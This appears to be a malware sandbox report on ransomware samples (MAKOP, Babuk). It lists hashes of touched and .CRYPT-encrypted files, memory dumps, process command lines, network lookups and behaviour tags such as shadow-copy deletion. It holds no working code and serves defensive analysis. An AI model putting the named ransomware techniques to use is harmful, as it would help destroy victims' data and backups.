SHA512 bc789786f1261ce50116190f56ce7da3063fb944af6e5da17fd0a61e51d3d25b11fc09a83d2fd1805e16f33c2c469bd28d05366b8fff7faa85d3dd498e5e3d1a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png

MD5 7d1b0ec51595563c9214ddfdec36f303
SHA1 bbb988973a8281943b5bfacb8ab03d97c0f0f398
SHA256 c915635ac032617e1acf87810abd8e8d9825c7e40a74245bc9efcf31d6da9da9
SHA512 709deed649d6062cf8c1ada7207b9c871d51a69a4bc7dc3c1408bd6a38d211ff53ce19a091cc4bb68a62eb00aa512afd07a33d314393812716391f04faea93d3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js

MD5 ac24e253ff384d8523af43f5a93688f7
SHA1 beb4ffa972185300803e9a1f6a16ec062cec1015
SHA256 f49327d72a4888fee8721962d13a94571e349ba666a0e1354c4f49331e858cff
SHA512 9c559a1bdaae9172fbe9e6a9b907390041fd16d0382a202423e0d9d19bb0f2c06a7228d6bc17df943d4e927c0420f302982e0463755bfd5c0d6e4ecb65504a61

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js

MD5 cb05ff26ffcb30838de16f659f8d93c9
SHA1 f9e977e1f60be49be8a17cf75d31f4a7620827ab
SHA256 ef97178fce43f78773e1c57cebaadd55904a1e5d810f8f75219b23e92c00687d
SHA512 26fc3838e5ef5b638d974be02b6d8f76f7f4778b1b612ea9031c5a5b1cf4a421e48c7a667a1f8db55270c1c86c4e1ec469c8078dd0edaeec2df02fddff27a999

C:\ProgramData\Microsoft\Windows\Caches\{F337657F-5568-4EC8-923D-F92E0EB7EE39}.2.ver0x0000000000000001.db

MD5 8b836d8d3ea988668ddae3311f514a57
SHA1 af3199496b831b74bde630f871615ce5848f9857
SHA256 ac944397bb7351bf439ea8b7e6cf5863fed078383f3da0b7c92b53408fe680d5
SHA512 f205183db25237a58c6a33b9c83af86df3210fc7cc411d4638af9c856fb39a2795c99d612601bdf183101402ed6455b7949a9deabfb2b2262afe47dff0c17cc2

C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\0f8e2cd5-b8eb-7a22-b9e9-9b1183fa0a84.xml

MD5 29eb0301f92bda0d67f79582acadf847
SHA1 2c2ac90238793f699322833c2f8bd043cc29ddec
SHA256 221ce3a8c269f4dff433a9a8a9807f65d8fa7b302e640b245f7293a0998363d6
SHA512 61f47426e5dff09a432a7848f3d07cfb5f85cab6b327fb416c31223e6a5ecaaf3a3f065a6c4bf0a352fb4fd3c7199ae481c929c43da3d596000f87d7f6bd52c1

C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\bb26a0e5-d235-0ee6-0c36-6d5e185fa5b1.xml

MD5 31434364acba2fa351fc9715db743df4
SHA1 1c2e77b236cfdd14960e90c9a48e59532d1a255b
SHA256 a94fc52f4840aa6390d47765d3fce16ab6d1c1978441156ef607a4b6f63fc317
SHA512 b069a65226c5aea8d50da2a179a351051a6680cf42a117d5d5b98e97bdcdd12e412f698b89039bd3464550e5794d3b95d97c6ee6931dc72e1bb060daa08e40b4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini

MD5 ace3165e852adb8aedbeda2aa3be570b
SHA1 4577ff7e92850e2723008f6c269129bd06d017ea
SHA256 237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f
SHA512 cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db

MD5 c7c6abfa9cb508f7fc178d4045313a94
SHA1 4f130f23896bd6d0e95f2a42b2cb83d17ac8f1a2
SHA256 1bda9f0aed80857d43c9329457f28b1ca29f736a0c539901e1ba16a909eb07b4
SHA512 9f1c1e438b8cceda02663a61a64c1c5fc6fb6238aa92d30e6d8d1a7b0cb29a8a6f26b63b9964ad876617f71ee7dc3c05205158c4ed4be327149652b1c6900825

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

MD5 4534f12102d235344cf8dda748f0cabf
SHA1 7db67baceeecb3a420bf37a7beca4a45185f8f3c
SHA256 1bd4db450abc8914c2fac721cace2704ff4c16028e6d07293154dad289835694
SHA512 7b4dacdbc6a2fccdd3818eb41b7fa23eeec51f333af0e842d9185c7ae45eba1623369b1caa27b824cba10c4cd6a2cdbf7f127ab2c6f7656eedce5fe25a0b84a2

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e2b8b059-2290-4735-a51e-04a2d858724a}\0.1.filtertrie.intermediate.txt

MD5 f6a6263167c92de8644ac998b3c4e4d1
SHA1 c1fe3a7b487f66a6ac8c7e4794bc55c31b0ef403
SHA256 11770b3ea657fe68cba19675143e4715c8de9d763d3c21a85af6b7513d43997d
SHA512 232d43e52834558e9457b0901ee65c86196bf8777c8ff4fc61fdd5e69fd1d24f964fed1bf481b6ef52a69d17372554fecb098fb07f839e64916bdd0d2abf018a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db

MD5 794e3946d02095ca5a7174cc1c5c3ad7
SHA1 d0d869fc4814041604f05c1819dbaede5897c3d8
SHA256 dcfcb4fb798556493cb1ee43012f501b2d1fd16b63aa163fe8117c359b9ff131
SHA512 1d2f06e2e640eb5fccc7762196a06a92aecdb880f9cc9d2c0a6f72cc654b549c896cba8d09a23f8571073c89c17ddde27db60d9223ba9bda11776c1d89a8e08a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 061ce6fe66cc378b312f2173e6146e32
SHA1 00e8fcc73c8309ee97342750cd5a73287744299a
SHA256 a2e5ca1818a970102b678fcbf4e098f845d269baa785d9a9d200de0cca56e92b
SHA512 c9133fc6ee8f9ae517da08306a7abd3cb855f594a3e7ef89815e0635380d28a8c9c97fc592a8d1b80798d84c4bc48f531f09fd0ebe3b471a6e3880ac482fd4a9

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5 c54cde3ceede65db57e1ef09429038d6
SHA1 d40df43ca2538ba8f23eb8d5e6ba48c6cd1a29a7
SHA256 80a0bcaaf774d79edb86f7cf3793bb8d584f3b74a67112b7b7b651aa762240eb
SHA512 1677ee5d05e7357550bf0b45d5f077557e3835d066ac930692112c69c4719a4f618af33f8531b9b99f202d3e69716e2f53faa7da0c8092ffa22a43b585777f2b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 0150b46ed17d8afad43443d983cd3ea7
SHA1 b508398f95127bdf4dc10a647751d6d1b6c4e985
SHA256 e6e6f2088fac30d468f6358f2974993f54914c770ced0a7dff8f0083654ab590
SHA512 d0fdc4482f7c077d96d49afedce04f74a34dd7841d8ce40d306dceae896a642cc56b65ee1843635cb5d9ca7efae0a2185c820899555133d59d91d991872ef3fe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db

MD5 ae6fbded57f9f7d048b95468ddee47ca
SHA1 c4473ea845be2fb5d28a61efd72f19d74d5fc82e
SHA256 d3c9d1ff7b54b653c6a1125cac49f52070338a2dd271817bba8853e99c0f33a9
SHA512 f119d5ad9162f0f5d376e03a9ea15e30658780e18dd86e81812dda8ddf59addd1daa0706b2f5486df8f17429c2c60aa05d4f041a2082fd2ec6ea8cc9469fade3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{03BA58C4-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.CRYPT

MD5 18702d4f8877ad2e936a4284dd428e59
SHA1 8a919f584eda5611e49fe1d1102713246f3da236
SHA256 1d1b62f7111bf53a9eda4bcf68c98e7e026fbb7c03fa2577d11ef8437d4189ef
SHA512 9fff0d6620a28749f02c90ed1fbd5ec5515d1575e12410f65b40beebbd4312daf3e12c00c13f8e3774e62432943bfc0a6f939d8892b54c2049c3272df83aa6cf

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 2ee8f59b7211eeda18023f0202f0e55d
SHA1 840921d8e124bf233db3969d04ef3911d5a87503
SHA256 8dd07eefa59b6e85934c9fc5af24ef3cc414dad04b3b03792d348a32d5c23a75
SHA512 ea44c1f912625c0b522ec54c3e64233b08123088e9caf77a6e563e02403545b2ad13fe96ad5739bce1b54cb57930eb913fbcdb4f2b17889ee45fbe769ad5bd9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 c40e417829c7873578be9dc87c904cf7
SHA1 295f131b8db3401025523f48ae8af4e121f20123
SHA256 bbb76aec5e68f131eba7b7ae21e81e182c39d5dfcc4ad615c799b2a2372c8461
SHA512 b0182d595d49dbdac4bba6d599de1ebcdc4f93ef7f797dc7ec8295295ff6f9ccebfce160181ad2ae5ae4f1e36e65a8af49c79a8280b50e22ae84567656723d82

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5 72ef40c1915afb3e7ef638c512a7579f
SHA1 616180f75ee011973c4254e4a280dc942a0cd678
SHA256 1d86639508717d445c88d742e12143e51679bded592bf878a0164ef04aba67b1
SHA512 09b8a61cd5a63ba9050ff61b7dfdcdc92da29dad692e11c1c70d6e181cd65e38a6b815766fce5d2d35f165b4c1fbe0d8f573173e0a724d887f7b58ac2cb4ecad

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 392e428700fd6c73548d596d25f86d17
SHA1 95821fc7c16f3702440baae6b441a73fc23e2b6d
SHA256 5732cbc8637d933a31ac6ea8437d799423d269a711f214985e005f4f4d21ebbf
SHA512 c4c9d9ea800025686390cee626854b7f5b62c0c7e82678b8c655bd35ffe46bca0cc5ce628a8955b89983af51664be2e508df3c2e41b4b59e72c22a3fe05956a4

C:\USERS\ADMIN\DESKTOP\REDOSEND.XLSX.CRYPT

MD5 3e7c6a1a31198245395cb0390a804843
SHA1 e1a65025b78b01ee54640330ecd573db2b91510e
SHA256 9974fa3b2e1a4f2ba8f3aea1cc3e5cca87abbe8c8339cf3cdcc7dd4c279d3b05
SHA512 7d1ba6357f79e2faefea29e300a2d8e0d4b647a358005b6fb6374280303a124469c6eea76531d6c01c7e66a9730d2a4b48d127b5fa4297917c77aa3d042a98a8

C:\USERS\ADMIN\DESKTOP\UNINSTALLEXPORT.TIF.CRYPT

MD5 ece3714113de91af4fa2429db4334726
SHA1 66c121ef204ae50c287170c27776960305fca41d
SHA256 1733aa5c08f00c79714a5ac22758407427379ff00eab275024b3531ef159a9d5
SHA512 778c0abcb54c56d29fa99b70d3d88ca985ad5059a9d6d041edeb5dd0e4e94975e84751db84172db3436028c87c32d7b6932df6322d31270a7b2e6bab11bbbd8f

C:\USERS\ADMIN\DESKTOP\SUBMITINITIALIZE.XLSX.CRYPT

MD5 346fb3ba575d343334f26e752c6191ad
SHA1 18de794fb71adf24cfe41fb937f2e3ab41bc7f4a
SHA256 12afae26f1d0ba5a3aad408a2df474f2c0e9336a959c51d328c9584809e8faea
SHA512 47d76b561a3dd4812f79d61388383f812877777da65ab506bef0a186c1d181671cc49244470175d6a46e6b2499181d7628baff757c335e2f4242eb8257527254

C:\USERS\ADMIN\DESKTOP\SHOWCOMPRESS.DWG.CRYPT

MD5 162248efc633a4124c22b2d6e70b1903
SHA1 93bb80672291b80ae06ee8402c52fc856f29b63a
SHA256 52cd49adabd9ec0f18da26f32a351172c90761e9167037f65e15eeafcb928ce4
SHA512 bc99c314b2fbad70ab01e668635814fed0834736c8479296aefd3b9895f5d9d114dcefb027df5b0287bd7e8538bbbe1530305cec124005d019ece3ef13d7c78b

C:\USERS\ADMIN\DESKTOP\RESUMEPING.DOCX.CRYPT

MD5 4d09842e882b144c3f81298b879d2dcb
SHA1 26b6a379e781f728c38e348124528a0c705d6760
SHA256 c6ef200ee87e574ac4fc204fdeb43ae36eb296eafd3f3abeab33de923bf45e1c
SHA512 855281712a9d7b6c5332825ef370d21e91877e0b6387a55a1266342003bd11410b4fdff99b0a3a90e4b6b25362b557695e3ed1a804e5f6c596636889ffce6ead

C:\USERS\ADMIN\DESKTOP\REQUESTGRANT.DOCX.CRYPT

MD5 aedcf971db9f42c48a7c60ba2d5cfd7c
SHA1 a7c237fb1795158698c8e3cce04c8e5526b3e8f1
SHA256 3ec5167148f8456ebbbccf1a06af91c7fb91f0eaa067b6dd51309076252662f0
SHA512 f98eb4863c87a771b22477ccba5f242cfd304cd8bef25bb7bac11bb7b6a0c5df1c7bbeaf16e559c1366ddb5de3b817a8a05b8702c1db9c01c954853614f05765

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db

MD5 d6463e79fee89ce8f669ff371a8be181
SHA1 2aafe905430acb59d09ad4dfa646e6fdec868f12
SHA256 429d4da80e7baf36c0d1df95ed5ed12fe870a2d5e6cf3f07014b0a762fc10849
SHA512 4e7947e8319842c8393355bf177a874054a7088eac46730f6b3f65c87d2b2bf3bf57ee92d9ba5507618a8dad07d8f8aec0dd6acb468ef29905ac42656afe964e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db

MD5 3697525427d6bb4902c016c932367680
SHA1 98cfe25bdf580aa2b46e5297b0f25618321a05fa
SHA256 b5dd5d4989f6253e95084f289d916feef445d6519c4e2bb604c359e29c5ea8bf
SHA512 3977c0bc2fb49726bec9aa921a14e0283f89a08b73c7f9672dfed1f428e94c8acd1dcbbd43e81ba749976617fd6d103a99dbc50d75df5ece880e6e863d1a98ba

C:\USERS\ADMIN\DESKTOP\POPSHOW.DOCX.CRYPT

MD5 e0ebdf33726aae1d7841381b0ff979c3
SHA1 c488831d48f496656080adfed8dfbc55da5093c5
SHA256 fa7dc27832a92316c47d84a7d3ad886369eefcdbddf537b2ce934ce937948fdf
SHA512 73f4325e64bf9c8210f88b3c62069ce6ec947c356f3f654141a3ef685e53bc086936c8b59a661bf5529b3507434078e8b729da1905095c44fb64b5eb33e177fa

C:\USERS\ADMIN\DESKTOP\POPREPAIR.PPS.CRYPT

MD5 d976b33d9b0be4e0103a1ca48bc3d13c
SHA1 9baa91e6a554662931404c18a36f80cf2fda1224
SHA256 f27ea6c1b72a7a62a013061c857337afa5ad324c7427cea072846892d43db214
SHA512 655b992dab3ac8209c84da47b87e4148873e9058387381af6733e68ddb1c2dea6bb663edb2eb136143ed1baf5924312ed89e207c1c00c52b528cb441fe043a93

C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

MD5 2350b47261040b1ee32f7df427ab30fc
SHA1 e656cced405e01b6a60b7444b2c9e1b31ed7c63a
SHA256 612881f476b4820221970c20f44ee5d9cd9c64a2cd3c9ec82e6757209c0184db
SHA512 a9e5838e63c2f786d57fd3e808ed54c6af0f7fc60dcc9cc1d606309d976c1b8954ef6271838db3e20325a6d66889362e3f28825a6fdba5075b860efc43d1d941

C:\USERS\ADMIN\DESKTOP\LOCKOUT.XLSX.CRYPT

MD5 bfbe8b30aafe9584fc3ce7e6ea7a52bd
SHA1 8453702da1b38b06f8968b2fef3e41df9f1cd7a4
SHA256 01c9c67dc5d4dbe573f993622632166e0b41d72e579458c152e7fb66908d0a7d
SHA512 585a0b1b51ff08a29738b8cdf93b7705696382d8a457e6107516f223195c697a64a29fc1bad19a5a0f48b72b580af45ca6409421c3ff08f7a32e2f9b98a76798

C:\USERS\ADMIN\DESKTOP\GRANTEDIT.DLL.CRYPT

MD5 b69fa40fe3a18c578c5c9314756b6a10
SHA1 a3fa8dcada3ffe3deff4611d11367e46d74ec33f
SHA256 5f682761588f3f1d95a64f1886f109eba2092f65207ec52365e60a06c79b7622
SHA512 7dbd9ad40d3137f845ed1747fc4231bdab82b44854456616e273ce02b619e969f43682fc2f4c2d3ed07b292c72afc583bd654f941bef35c11c2cca0f3832dc54

C:\USERS\ADMIN\DESKTOP\DESKTOP.INI.CRYPT

MD5 718404539d55dc799af289df2922402f
SHA1 aaaac41aede0e09cc9e32eb492d71320a0d68822
SHA256 9b784d878936df4b1b912a245dea6ebf90848777b26e27cd9aaded29a8f2442d
SHA512 0bf614566590995bccde3d0553742e04f5c7c3560b1006823589163d0274fceca7c5b66090906fb74add518db2b7eab2745dc7e0e15f47ebb03d9f562c1f5489

C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI.CRYPT

MD5 23ca926074f3177efefc057fdce61909
SHA1 c6900ac94ccf77b5860c3cbc7961f1bee2462574
SHA256 0f571fc5ba58a8bd8f8d5983e60d71ea54a748d789860780c59bcc03a12d3bbe
SHA512 c07eae9d2257c6a39b723af11b5f4f988dc3a1f5e120df49dde74767249374f1948728c65d0500e75cbdfeb2aef7d2f2debaf88546db2dad1c56299dd1595251

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db

MD5 c6bdb2c17c82f117224e609cae65e5dd
SHA1 3f1e92be35ca40127233dc55776a9ea151efc00e
SHA256 cd7f1225a8e24bac0da13c1ff6559f8492cd6cbce920ca87b12c2e017d1c177e
SHA512 46c28e86c3956ec81d96bcad06a5ab90087a9bcd971efa91188584e75f9fe21cb41458ac0ff215911543d1417b131e3a8847d9cb5d0998c8f48c90cc90938586

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin

MD5 0f7dff66a128cced04327977bc7b5e7a
SHA1 d7b4ec941cfc3dec39525b047ca8f02e12061192
SHA256 da07d7603eadcd9d567889527fd3548990260ce623b891acb527486f234807d1
SHA512 45a88d12fedd37014eca03ddf5628fa7c4509270098f2c08412825ac50aeeab37bde8608b8a76a7f8504e6d6b3ad87b676ae69bdffa491620e7d2f2210ff50ae

memory/4804-22287-0x00000000046A0000-0x00000000046A1000-memory.dmp

memory/3688-22294-0x000001563AD00000-0x000001563AE00000-memory.dmp

memory/3688-22293-0x000001563AD00000-0x000001563AE00000-memory.dmp

memory/3688-22309-0x000001563BCB0000-0x000001563BCD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini

MD5 e0fd7e6b4853592ac9ac73df9d83783f
SHA1 2834e77dfa1269ddad948b87d88887e84179594a
SHA256 feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122
SHA512 289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55

memory/3688-22292-0x000001563AD00000-0x000001563AE00000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 14e6a23a73c1daf677d9380cc5ab0ff6
SHA1 71360d640b94d01a4c11848620cd5edef7354b83
SHA256 cc2f94a6e4190c944389d2bc3e6c1a72e1a6a3c06b37347b27546dd3f44e3d00
SHA512 04e415011fc5f76cc2249e45154d6807baf687cd4063edb9bf8f2cdf342c66492e0630d41e0bc8583664b08e4d017bf3a19eeb378e49d75ce9b2a1098550ec41

memory/3688-22332-0x000001563BC70000-0x000001563BC90000-memory.dmp

memory/3688-22346-0x000001563C420000-0x000001563C440000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\XNP9L40F\microsoft.windows[1].xml

MD5 a7237b6af01e07ac7d6ab6e6cdc2d0d3
SHA1 717b37a5b71c978fbd8dcae6a001c1240ded3ecf
SHA256 2f1bea9130376d79550c47fa39423f14c1f8bed1ecd5cf7786c0728c25c40828
SHA512 5513cda40fbfc32a7676fad05f7c115882de0857a379f5ab48bc60e0790ffc520222896f7e3732b71bd82b0c4355a51764c99145500be0c04c24f31c1f232810

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648350685966153.txt

MD5 ecaea544af9da1114077b951d8cb520d
SHA1 5820b2d71e7b2543cf1804eb91716c4e9f732fde
SHA256 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6
SHA512 dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 15ca64d1fbbd741533ee7ed0547a167e
SHA1 be93f638368c73fb1cd3c48ec0386bf1b526e4c8
SHA256 26bff0d8a321a62197c34e0ccf63b5b673559245fb18982afacc4f72def7abb9
SHA512 78a276b9ebb5a81324d9402a859fcd6cfe02f04211da729b88a8fa79d3a968c0e75e48bcd16e8691b5ad57718fa161a12c992227978abb2c4471b141679e6b47

memory/3712-22477-0x0000000002780000-0x0000000002781000-memory.dmp

F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

memory/3944-22481-0x0000029248D00000-0x0000029248E00000-memory.dmp

memory/3944-22482-0x0000029248D00000-0x0000029248E00000-memory.dmp

memory/3944-22487-0x0000029249D20000-0x0000029249D40000-memory.dmp

memory/3944-22506-0x000002924A0F0000-0x000002924A110000-memory.dmp

memory/3944-22491-0x00000292499E0000-0x0000029249A00000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

MD5 1033bd83533c62faec9fd85f4877e447
SHA1 7fa5e4e4eeb7ab7ab1ef0a77e4e1cfdce234fd86
SHA256 5eac1a6ad953fe54affc7b086058aa71d6e340a583b9f01325433b31b50cf63f
SHA512 1ca348d9b08838d5ca5fd404188a44140c7181fefcd714adae41bc8296bac55c519bc92b37b1af175f513900964c3bbae7586b178848691ba17c0c4e6f141ba2

memory/1624-22625-0x0000000004E00000-0x0000000004E01000-memory.dmp

memory/2380-22627-0x0000027C75500000-0x0000027C75600000-memory.dmp

memory/2380-22629-0x0000027C75500000-0x0000027C75600000-memory.dmp

memory/2380-22632-0x0000027C764B0000-0x0000027C764D0000-memory.dmp

memory/2380-22649-0x0000027C76470000-0x0000027C76490000-memory.dmp

memory/2380-22664-0x0000027C76880000-0x0000027C768A0000-memory.dmp

memory/2508-22773-0x0000000004A20000-0x0000000004A21000-memory.dmp

memory/4200-22777-0x0000025275000000-0x0000025275100000-memory.dmp

memory/4200-22776-0x0000025275000000-0x0000025275100000-memory.dmp

memory/4200-22781-0x0000025275FD0000-0x0000025275FF0000-memory.dmp

memory/4200-22791-0x0000025275F90000-0x0000025275FB0000-memory.dmp

memory/4200-22794-0x00000252763A0000-0x00000252763C0000-memory.dmp

memory/3640-22908-0x0000000004520000-0x0000000004521000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{6ACD7EAB-A077-4062-B626-CBB2C4C42BD8}.png

MD5 00e5fcfd833151f7cbde607e2f7afeb4
SHA1 55839875c0947aafebff53d22ccc5dad29fe3563
SHA256 b80192aaabe007baecd0603e3ce183e9d554b8a6b0411d20716acfa086ae3035
SHA512 f056777a1987c3becdc217bdc2d82e6aa41086d38fddaa45c42f1726b6f7b7616a10918081650e825a724464ef148b669bc258d38a62e0de8642e2607a0b0de7

memory/4636-22916-0x00000116AEE20000-0x00000116AEE40000-memory.dmp

memory/4636-22929-0x00000116AEBE0000-0x00000116AEC00000-memory.dmp

memory/4636-22942-0x00000116AF1F0000-0x00000116AF210000-memory.dmp

memory/3036-23057-0x0000000002990000-0x0000000002991000-memory.dmp

memory/3656-23060-0x000001F91FF00000-0x000001F920000000-memory.dmp

memory/3656-23061-0x000001F91FF00000-0x000001F920000000-memory.dmp

memory/3656-23065-0x000001F920E90000-0x000001F920EB0000-memory.dmp

memory/3656-23088-0x000001F921260000-0x000001F921280000-memory.dmp

memory/3656-23074-0x000001F920E50000-0x000001F920E70000-memory.dmp

memory/652-23205-0x0000000004650000-0x0000000004651000-memory.dmp

memory/1096-23209-0x0000024BDB820000-0x0000024BDB920000-memory.dmp

memory/1096-23210-0x0000024BDB820000-0x0000024BDB920000-memory.dmp

memory/1096-23213-0x0000024BDC830000-0x0000024BDC850000-memory.dmp

memory/1096-23208-0x0000024BDB820000-0x0000024BDB920000-memory.dmp

memory/1096-23230-0x0000024BDC7F0000-0x0000024BDC810000-memory.dmp

memory/1096-23233-0x0000024BDCC00000-0x0000024BDCC20000-memory.dmp

memory/2956-23348-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

memory/3532-23349-0x000002C843900000-0x000002C843A00000-memory.dmp

memory/3532-23351-0x000002C843900000-0x000002C843A00000-memory.dmp

memory/3532-23350-0x000002C843900000-0x000002C843A00000-memory.dmp

memory/3532-23355-0x000002D0458D0000-0x000002D0458F0000-memory.dmp

memory/3532-23381-0x000002D045CA0000-0x000002D045CC0000-memory.dmp

memory/3532-23380-0x000002D045890000-0x000002D0458B0000-memory.dmp

memory/4800-23493-0x00000000043D0000-0x00000000043D1000-memory.dmp

memory/4456-23502-0x00000217617C0000-0x00000217617E0000-memory.dmp

memory/4456-23515-0x0000021761780000-0x00000217617A0000-memory.dmp

memory/4456-23524-0x0000021761D90000-0x0000021761DB0000-memory.dmp

memory/1512-23641-0x0000000004440000-0x0000000004441000-memory.dmp

memory/3304-23645-0x00000162ABE00000-0x00000162ABF00000-memory.dmp

memory/3304-23646-0x00000162ABE00000-0x00000162ABF00000-memory.dmp

memory/3304-23671-0x00000162AD180000-0x00000162AD1A0000-memory.dmp

memory/3304-23660-0x00000162ACB70000-0x00000162ACB90000-memory.dmp

memory/3304-23649-0x00000162ACBB0000-0x00000162ACBD0000-memory.dmp

memory/3304-23644-0x00000162ABE00000-0x00000162ABF00000-memory.dmp

memory/3596-23783-0x0000000004560000-0x0000000004561000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:14

Platform

win10v2004-20240704-en

Max time kernel

1660s

Max time network

1157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3820 -ip 3820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 948

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsvACBC.tmp\System.dll

MD5 fccff8cb7a1067e23fd2e2b63971a8e1
SHA1 30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512 f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240704-en

Max time kernel

1559s

Max time network

1569s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (450) files with added filename extension

ransomware

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
